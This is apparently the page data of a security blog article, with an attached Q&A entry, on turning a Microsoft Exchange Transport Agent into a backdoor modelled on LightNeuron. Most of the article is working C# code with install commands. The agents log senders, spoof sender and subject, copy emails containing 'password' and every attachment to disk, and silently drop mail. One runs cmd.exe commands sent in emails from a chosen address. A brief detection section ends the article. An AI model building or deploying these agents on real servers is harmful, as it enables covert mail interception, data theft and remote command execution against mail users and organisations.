[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6zxax1HXL9lofk9BIfUiquBAXqyeVzq_9W1DasFPKSY":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":33,"aiModel":30,"aiConfidence":30,"updatedAt":49,"createdAt":49,"_status":48},838,"What malicious actions can a Transport Agent backdoor perform on email traffic?","A malicious Transport Agent can monitor every email by logging sender, date, and content; modify email subjects, sender addresses, and display names; delete or block emails entirely; and even extract attachments or search for keywords like 'password' to exfiltrate sensitive data. The agent can also be designed to launch external programs, turning the Exchange server into a command-and-control node. Similar backdoor techniques exploit junction folders or library files, as described in [Penetration Techniques - Backdoor Exploitation of Junction Folders and Library Files](\u002Fnews\u002Fpenetration-techniques-backdoor-exploitation-of-junction-folders-and-library-files).","\u003Cp>A malicious Transport Agent can monitor every email by logging sender, date, and content; modify email subjects, sender addresses, and display names; delete or block emails entirely; and even extract attachments or search for keywords like &#39;password&#39; to exfiltrate sensitive data. The agent can also be designed to launch external programs, turning the Exchange server into a command-and-control node. Similar backdoor techniques exploit junction folders or library files, as described in [Penetration Techniques - Backdoor Exploitation of Junction Folders and Library Files](\u002Fnews\u002Fpenetration-techniques-backdoor-exploitation-of-junction-folders-and-library-files).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-using-transport-agent-as-an-exchange-backdoor\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-malicious-actions-can-a-transport-agent-backdoor-perform-on-email-traffic-1777481556369","email monitoring, email modification, email deletion, keyword filtering, attachment exfiltration",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":19,"readingTime":32,"status":33,"publishedAt":34,"seo":35,"tags":39,"qaPairs":40,"meta":45,"updatedAt":46,"createdAt":47,"_status":48},205,"Penetration Techniques - Using Transport Agent as an Exchange Backdoor","penetration-techniques-using-transport-agent-as-an-exchange-backdoor","Explore how Transport Agent in Microsoft Exchange can be exploited as a backdoor for reading, modifying, and blocking emails, with defense tips.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>ESET research has discovered a malware named LightNeuron specifically targeting Microsoft Exchange, which employs a previously unseen persistence technique: Transport Agent, capable of achieving the following functions:\u003C\u002Fp>\u003Cul>\u003Cli>Read and modify any email passing through the mail server\u003C\u002Fli>\u003Cli>Compose and send new emails\u003C\u002Fli>\u003Cli>Block any email. The original recipient will not receive the email\u003C\u002Fli>\u003C\u002Ful>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.welivesecurity.com\u002F2019\u002F05\u002F07\u002Fturla-lightneuron-email-too-far\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.welivesecurity.com\u002Fwp-content\u002Fuploads\u002F2019\u002F05\u002FESET-LightNeuron.pdf\u003C\u002Fp>\u003Cp>This article, solely from a technical research perspective, introduces the usage of Transport Agent, writes code to implement different functions, and provides defense recommendations based on exploitation ideas\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Transport Agent Basics\u003C\u002Fli>\u003Cli>Usage of Transport Agent\u003C\u002Fli>\u003Cli>Monitoring emails using Transport Agent\u003C\u002Fli>\u003Cli>Modifying emails using Transport Agent\u003C\u002Fli>\u003Cli>Deleting emails using Transport Agent\u003C\u002Fli>\u003Cli>Launching programs using Transport Agent\u003C\u002Fli>\u003Cli>Defense detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basics of Transport Agent\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>References\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fprevious-versions\u002Foffice\u002Fdeveloper\u002Fexchange-server-2010\u002Fdd877026(v=exchg.140)\u003C\u002Fp>\u003Ch3>1. Transport Agent\u003C\u002Fh3>\u003Cp>Can be used to extend and modify Exchange's transport behavior to customize message acceptance, rejection, routing, and delivery, as well as convert between various types of content\u003C\u002Fp>\u003Cp>Simply put, Transport Agents act as plugins for Exchange, enabling the extension and modification of Exchange's transport behavior, such as reading, modifying, and deleting each transmitted email\u003C\u002Fp>\u003Ch3>2. .NET Framework Extensions for Exchange\u003C\u002Fh3>\u003Cp>The Microsoft.Exchange.Data namespace provides types that facilitate the following tasks:\u003C\u002Fp>\u003Cul>\u003Cli>Read and write MIME data\u003C\u002Fli>\u003Cli>Convert message body and other text from one encoding to another\u003C\u002Fli>\u003Cli>Read and write TNEF data\u003C\u002Fli>\u003Cli>Read and write calendar and appointment data\u003C\u002Fli>\u003Cli>Convert message formats; for example, from HTML to RTF\u003C\u002Fli>\u003Cli>Respond to SMTP events\u003C\u002Fli>\u003Cli>Respond to routing events\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Simply put, using the Microsoft.Exchange.Data namespace allows extending and modifying Exchange's transport behavior\u003C\u002Fp>\u003Ch2>Usage of 0x03 Transport Agent\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fprevious-versions\u002Foffice\u002Fdeveloper\u002Fexchange-server-2010\u002Faa579185(v=exchg.140)?redirectedfrom=MSDN\u003C\u002Fp>\u003Cp>C# development, using the Microsoft.Exchange.Data namespace\u003C\u002Fp>\u003Cp>Using Visual Studio, create a new C# project, select Class Library as the project type, and reference the following DLLs:\u003C\u002Fp>\u003Cul>\u003Cli>Microsoft.Exchange.Data.Common.dll\u003C\u002Fli>\u003Cli>Microsoft.Exchange.Data.Transport.dll\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The dll can be obtained from the Exchange server, located at %ExchangeInstallPath%Public, for example C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Public\u003C\u002Fp>\u003Cp>Test code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Text;\u003Cbr>using Microsoft.Exchange.Data.Transport;\u003Cbr>using Microsoft.Exchange.Data.Transport.Smtp;\u003Cbr>\u003Cbr>namespace MyAgents\u003Cbr>{\u003Cbr>    public sealed class MyAgentFactory : SmtpReceiveAgentFactory\u003Cbr>    {\u003Cbr>        public override SmtpReceiveAgent CreateAgent(SmtpServer server)\u003Cbr>        {\u003Cbr>            return new MyAgent();\u003Cbr>        }\u003Cbr>    }\u003Cbr>    public class MyAgent : SmtpReceiveAgent\u003Cbr>    {\u003Cbr>        public MyAgent()\u003Cbr>        {\u003Cbr>            this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);\u003Cbr>        }\u003Cbr>        private void MyEndOfDataHandler (ReceiveMessageEventSource source, EndOfDataEventArgs e)\u003Cbr>\u003Cbr>        {\u003Cbr>            \u002F\u002F The following line appends text to the subject of the message that caused the event.\u003Cbr>            e.MailItem.Message.Subject += \" - this text appended by MyAgent\";\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile and generate MyAgent.dll\u003C\u002Fp>\u003Cp>Copy MyAgent.dll to the Exchange server, save it to the path C:\\test\\MyAgent.dll\u003C\u002Fp>\u003Cp>Use Exchange Server PowerShell to install the Transport Agent with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Install-TransportAgent -Name \"MySpamFilterAgent\" -TransportAgentFactory \"MyAgents.MyAgentFactory\" -AssemblyPath \"C:\\test\\MyAgent.dll\"\u003Cbr>Enable-TransportAgent MySpamFilterAgent\u003Cbr>Restart-Service MSExchangeTransport\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The MSExchangeTransport service must be restarted to take effect\u003C\u002Fp>\u003Cp>Command to uninstall the Transport Agent:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Uninstall-TransportAgent MySpamFilterAgent -Confirm:$false\u003Cbr>Restart-Service MSExchangeTransport\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Command to view this Transport Agent:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-TransportAgent MySpamFilterAgent|fl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Command to view all Transport Agents:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-TransportAgent |fl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After the Transport Agent is successfully installed, use any user to send an email, and the email subject will be modified, indicating a successful test\u003C\u002Fp>\u003Ch2>0x04 Implementing Different Functions Using Transport Agent\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Example 1\u003C\u002Fh3>\u003Cp>Monitor emails, record sender and time, save file as c:\\test\\log.txt\u003C\u002Fp>\u003Cp>Code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Text;\u003Cbr>using System.IO;\u003Cbr>using Microsoft.Exchange.Data.Transport;\u003Cbr>using Microsoft.Exchange.Data.Transport.Smtp;\u003Cbr>\u003Cbr>namespace MyAgents\u003Cbr>{\u003Cbr>    public sealed class MyAgentFactory : SmtpReceiveAgentFactory\u003Cbr>{\u003Cbr>        public override SmtpReceiveAgent CreateAgent(SmtpServer server)\u003Cbr>        {\u003Cbr>            return new MyAgent();\u003Cbr>        }\u003Cbr>    }\u003Cbr>    public class MyAgent : SmtpReceiveAgent\u003Cbr>    {\u003Cbr>        public MyAgent()\u003Cbr>        {\u003Cbr>            this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);\u003Cbr>        }\u003Cbr>        private void MyEndOfDataHandler(ReceiveMessageEventSource source, EndOfDataEventArgs e)\u003Cbr>\u003Cbr>        {\u003Cbr>            using (System.IO.StreamWriter file = new System.IO.StreamWriter(@\"C:\\test\\log.txt\", true))\u003Cbr>            {\u003Cbr>                file.WriteLine(\"Sender:\" + e.MailItem.Message.Sender.SmtpAddress);\u003Cbr>                file.WriteLine(\"Date:\" + e.MailItem.Message.Date);\u003Cbr>            }\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Example 2\u003C\u002Fh3>\u003Cp>Modify the sender and subject of the email\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Text;\u003Cbr>using System.IO;\u003Cbr>using Microsoft.Exchange.Data.Transport;\u003Cbr>using Microsoft.Exchange.Data.Transport.Smtp;\u003Cbr>\u003Cbr>namespace MyAgents\u003Cbr>{\u003Cbr>    public sealed class MyAgentFactory : SmtpReceiveAgentFactory\u003Cbr>    {\u003Cbr>        public override SmtpReceiveAgent CreateAgent(SmtpServer server)\u003Cbr>        {\u003Cbr>            return new MyAgent();\u003Cbr>        }\u003Cbr>    }\u003Cbr>    public class MyAgent : SmtpReceiveAgent\u003Cbr>    {\u003Cbr>        public MyAgent()\u003Cbr>        {\u003Cbr>            this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);\u003Cbr>        }\u003Cbr>        private void MyEndOfDataHandler(ReceiveMessageEventSource source, EndOfDataEventArgs e)\u003Cbr>\u003Cbr>        {\u003Cbr>            \u002F\u002F The following line appends text to the subject of the message that caused the event.\u003Cbr>            e.MailItem.Message.Subject += \" - this text appended by MyAgent\";\u003Cbr>            e.MailItem.Message.From.DisplayName = \"test2\";\u003Cbr>            e.MailItem.Message.From.SmtpAddress = \"test2@test.com\";\u003Cbr>            e.MailItem.Message.Sender.DisplayName = \"test2\";\u003Cbr>            e.MailItem.Message.Sender.SmtpAddress = \"test2@test.com\";\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Example 3\u003C\u002Fh3>\u003Cp>Monitor emails, and if an email contains the string 'password' (case-insensitive), save this email to c:\\test with the file name \u003Cmessageid>.eml (to avoid duplicate file names, use the unique MessageId as the file name).\u003C\u002Fmessageid>\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Text;\u003Cbr>using System.IO;\u003Cbr>using Microsoft.Exchange.Data.Transport;\u003Cbr>using Microsoft.Exchange.Data.Transport.Smtp;\u003Cbr>\u003Cbr>namespace MyAgents\u003Cbr>{\u003Cbr>    public sealed class MyAgentFactory : SmtpReceiveAgentFactory\u003Cbr>    {\u003Cbr>        public override SmtpReceiveAgent CreateAgent(SmtpServer server)\u003Cbr>        {\u003Cbr>            return new MyAgent();\u003Cbr>        }\u003Cbr>    }\u003Cbr>    public class MyAgent : SmtpReceiveAgent\u003Cbr>    {\u003Cbr>        public MyAgent()\u003Cbr>        {\u003Cbr>            this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);\u003Cbr>        }\u003Cbr>        private void MyEndOfDataHandler(ReceiveMessageEventSource source, EndOfDataEventArgs e)\u003Cbr>\u003Cbr>        {\u003Cbr>\u003Cbr>            long len = e.MailItem.GetMimeReadStream().Length;\u003Cbr>            byte[] heByte = new byte[len];\u003Cbr>            int r = e.MailItem.GetMimeReadStream().Read(heByte, 0, heByte.Length);\u003Cbr>            string searchData = System.Text.Encoding.UTF8.GetString(heByte);\u003Cbr>            if (searchData.IndexOf(\"password\", 0, StringComparison.CurrentCultureIgnoreCase) != -1)\u003Cbr>            {\u003Cbr>                string[] sArray = e.MailItem.Message.MessageId.Split('@');\u003Cbr>                sArray[0] = sArray[0].Substring(1);\u003Cbr>\u003Cbr>                FileStream fs = new FileStream(\"c:\\\\test\\\\\" + sArray[0] + \".eml\", FileMode.Create);\u003Cbr>                fs.Write(heByte, 0, heByte.Length);\u003Cbr>                fs.Close();\u003Cbr>            }\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Example 4\u003C\u002Fh3>\u003Cp>Monitor attachments, save attachment names in c:\\test\\log.txt, and save all attachments to c:\\test with file names as attachment names\u003C\u002Fp>\u003Cp>Code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Text;\u003Cbr>using System.IO;\u003Cbr>using Microsoft.Exchange.Data.Transport;\u003Cbr>using Microsoft.Exchange.Data.Transport.Smtp;\u003Cbr>\u003Cbr>namespace MyAgents\u003Cbr>{\u003Cbr>    public sealed class MyAgentFactory : SmtpReceiveAgentFactory\u003Cbr>    {\u003Cbr>        public override SmtpReceiveAgent CreateAgent(SmtpServer server)\u003Cbr>        {\u003Cbr>            return new MyAgent();\u003Cbr>        }\u003Cbr>    }\u003Cbr>    public class MyAgent : SmtpReceiveAgent\u003Cbr>    {\u003Cbr>        public MyAgent()\u003Cbr>        {\u003Cbr>            this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);\u003Cbr>        }\u003Cbr>        private void MyEndOfDataHandler(ReceiveMessageEventSource source, EndOfDataEventArgs e)\u003Cbr>\u003Cbr>        {\u003Cbr>            if (e.MailItem.Message.Attachments.Count != 0)\u003Cbr>            {\u003Cbr>                foreach (var attachment in e.MailItem.Message.Attachments)\u003Cbr>                {\u003Cbr>                    using (System.IO.StreamWriter file = new System.IO.StreamWriter(@\"C:\\test\\log.txt\", true))\u003Cbr>                    {\u003Cbr>                        file.WriteLine(attachment.FileName);\u003Cbr>                    }\u003Cbr>                    FileStream fs = new FileStream(\"c:\\\\test\\\\\" + attachment.FileName, FileMode.Create);\u003Cbr>                    attachment.GetContentReadStream().CopyTo(fs);\u003Cbr>                    fs.Close();\u003Cbr>                }\u003Cbr>\u003Cbr>            }\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compared to Sample Code 3, there is a difference in the functionality of saving data to a file\u003C\u002Fp>\u003Cp>Sample 3 first reads data from the stream and stores it in a byte array, then converts the byte array to a string, and finally writes the string to a file via FileStream. Although this approach is less efficient, it supports full-text content search\u003C\u002Fp>\u003Cp>Sample Code 4 does not need to consider full-text search, so it can use Stream.CopyTo to copy two streams for improved efficiency\u003C\u002Fp>\u003Ch3>Sample 5\u003C\u002Fh3>\u003Cp>Monitor emails, and if the email content includes the string 'alert' (case-insensitive), then discard this email\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Text;\u003Cbr>using System.IO;\u003Cbr>using Microsoft.Exchange.Data.Transport;\u003Cbr>using Microsoft.Exchange.Data.Transport.Smtp;\u003Cbr>\u003Cbr>namespace MyAgents\u003Cbr>{\u003Cbr>    public sealed class MyAgentFactory : SmtpReceiveAgentFactory\u003Cbr>    {\u003Cbr>        public override SmtpReceiveAgent CreateAgent(SmtpServer server)\u003Cbr>        {\u003Cbr>            return new MyAgent();\u003Cbr>        }\u003Cbr>    }\u003Cbr>    public class MyAgent : SmtpReceiveAgent\u003Cbr>    {\u003Cbr>        public MyAgent()\u003Cbr>        {\u003Cbr>            this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);\u003Cbr>        }\u003Cbr>        private void MyEndOfDataHandler(ReceiveMessageEventSource source, EndOfDataEventArgs e)\u003Cbr>        {\u003Cbr>            long len = e.MailItem.GetMimeReadStream().Length;\u003Cbr>            byte[] heByte = new byte[len];\u003Cbr>            int r = e.MailItem.GetMimeReadStream().Read(heByte, 0, heByte.Length);\u003Cbr>            string searchData = System.Text.Encoding.UTF8.GetString(heByte);\u003Cbr>            if (searchData.IndexOf(\"alert\", 0, StringComparison.CurrentCultureIgnoreCase) != -1)\u003Cbr>            {\u003Cbr>                foreach (EnvelopeRecipient ep in e.MailItem.Recipients)\u003Cbr>                {\u003Cbr>                    e.MailItem.Recipients.Remove(ep);\u003Cbr>                }\u003Cbr>            }\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Example 6\u003C\u002Fh3>\u003Cp>Monitor emails; if an email is from a specified user (testa@test.com) with the subject 'command', then execute the content xxxx in the email body (format: command:xxxx\u002Fcommand)\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Text;\u003Cbr>using System.IO;\u003Cbr>using Microsoft.Exchange.Data.Transport;\u003Cbr>using Microsoft.Exchange.Data.Transport.Smtp;\u003Cbr>using System.Diagnostics;\u003Cbr>\u003Cbr>namespace MyAgents\u003Cbr>{\u003Cbr>    public sealed class MyAgentFactory : SmtpReceiveAgentFactory\u003Cbr>    {\u003Cbr>        public override SmtpReceiveAgent CreateAgent(SmtpServer server)\u003Cbr>        {\u003Cbr>            return new MyAgent();\u003Cbr>        }\u003Cbr>    }\u003Cbr>    public class MyAgent : SmtpReceiveAgent\u003Cbr>    {\u003Cbr>        public MyAgent()\u003Cbr>        {\u003Cbr>            this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);\u003Cbr>        }\u003Cbr>        private void MyEndOfDataHandler(ReceiveMessageEventSource source, EndOfDataEventArgs e)\u003Cbr>        {\u003Cbr>            if (e.MailItem.Message.From.SmtpAddress == \"testa@test.com\")\u003Cbr>            {\u003Cbr>                if(e.MailItem.Message.Subject.Contains(\"command\"))\u003Cbr>                {\u003Cbr>                    long len = e.MailItem.Message.Body.GetContentReadStream().Length;\u003Cbr>                    byte[] heByte = new byte[len];\u003Cbr>                    int r = e.MailItem.Message.Body.GetContentReadStream().Read(heByte, 0, heByte.Length);\u003Cbr>                    string myStr = System.Text.Encoding.UTF8.GetString(heByte);\u003Cbr>                    int i = myStr.IndexOf(\"command:\");\u003Cbr>                    int j = myStr.IndexOf(\"\u002Fcommand\");\u003Cbr>                    myStr = myStr.Substring(i + 8, j - i - 8);\u003Cbr>\u003Cbr>                    Process p = new Process();\u003Cbr>                    p.StartInfo.FileName = \"cmd.exe\";\u003Cbr>                    p.StartInfo.Arguments = \"\u002Fc\" + myStr;\u003Cbr>                    p.StartInfo.UseShellExecute = false;\u003Cbr>                    p.StartInfo.RedirectStandardInput = true;\u003Cbr>                    p.StartInfo.RedirectStandardOutput = true;\u003Cbr>                    p.StartInfo.RedirectStandardError = true;\u003Cbr>                    p.StartInfo.CreateNoWindow = true;\u003Cbr>                    p.Start();\u003Cbr>\u003Cbr>                }\u003Cbr>            }\u003Cbr>\u003Cbr>\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The launched process runs with NETWORK SERVICE privileges\u003C\u002Fp>\u003Ch3>Supplement\u003C\u002Fh3>\u003Cp>For debugging purposes, capture errors and output error codes to file c:\\test\\log.txt\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Text;\u003Cbr>using System.IO;\u003Cbr>using Microsoft.Exchange.Data.Transport;\u003Cbr>using Microsoft.Exchange.Data.Transport.Smtp;\u003Cbr>using System.Diagnostics;\u003Cbr>\u003Cbr>namespace MyAgents\u003Cbr>{\u003Cbr>    public sealed class MyAgentFactory : SmtpReceiveAgentFactory\u003Cbr>    {\u003Cbr>        public override SmtpReceiveAgent CreateAgent(SmtpServer server)\u003Cbr>        {\u003Cbr>            return new MyAgent();\u003Cbr>        }\u003Cbr>    }\u003Cbr>    public class MyAgent : SmtpReceiveAgent\u003Cbr>    {\u003Cbr>        public MyAgent()\u003Cbr>        {\u003Cbr>            this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);\u003Cbr>        }\u003Cbr>        private void MyEndOfDataHandler(ReceiveMessageEventSource source, EndOfDataEventArgs e)\u003Cbr>        {\u003Cbr>            try\u003Cbr>            {\u003Cbr>                \u003Cbr>            }\u003Cbr>            catch (Exception ex)\u003Cbr>            {\u003Cbr>                using (System.IO.StreamWriter file = new System.IO.StreamWriter(@\"C:\\test\\log.txt\", true))\u003Cbr>                {\u003Cbr>                    file.WriteLine(ex.Message);\u003Cbr>                }\u003Cbr>\u003Cbr>            }\u003Cbr>\u003Cbr>\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x05 Defense Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Check Transport Agent Configuration\u003C\u002Fh3>\u003Cp>Using Exchange Server PowerShell, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-TransportAgent\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Other PowerShell commands can be referenced at:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fpowershell\u002Fmodule\u002Fexchange\u002F?view=exchange-ps#mail-flow\u003C\u002Fp>\u003Ch3>2. Check Service Logs\u003C\u002Fh3>\u003Cp>Installing Transport Agent requires restarting the MSExchangeTransport service\u003C\u002Fp>\u003Ch3>3. Check Processes\u003C\u002Fh3>\u003Cp>After using Transport Agent, the process w3wp.exe will load the corresponding dll\u003C\u002Fp>\u003Cp>You can check whether the process w3wp.exe loads suspicious dlls\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the usage of Transport Agent, writing code to implement recording, modifying, and deleting emails, achieving common functions used as a backdoor, and providing defense suggestions based on exploitation ideas\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",7,"published","2026-02-02T07:38:21.197Z",{"title":36,"description":14,"keywords":37,"ogImage":30,"canonicalUrl":30,"noIndex":38},"Exchange Transport Agent Backdoor: LightNeuron Malware Techniques","Exchange Transport Agent, LightNeuron malware, email security, penetration testing, backdoor persistence, Microsoft Exchange, email monitoring, email modification, defense detection",false,[],{"docs":41,"hasNextPage":38},[42,4,43,44],839,837,836,{"title":30,"description":30,"image":30},"2026-07-24T02:07:18.280Z","2026-07-23T16:02:10.750Z","draft","2026-07-23T16:15:02.709Z"]